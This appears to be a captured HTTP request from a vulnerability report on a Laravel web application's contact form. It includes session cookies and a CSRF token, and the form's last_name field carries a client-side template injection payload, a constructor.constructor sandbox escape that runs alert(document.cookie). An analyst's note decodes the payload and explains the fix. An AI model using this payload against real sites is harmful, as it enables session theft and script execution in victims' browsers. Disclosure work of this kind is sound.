XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; 
laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D Upgrade-Insecure-Requests: 1 _token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true # Note: decoded, last_name is {{ constructor.constructor("alert(document.cookie)")() }} — a template expression (the usual sandbox-escape form), not an HTML tag. This points to client-side template injection in the contact views rather than plain HTML injection, so HTML-encoding the stored value alone likely does not stop it if the front-end template engine still evaluates the braces; the value needs to be bound as text, not compiled as a template.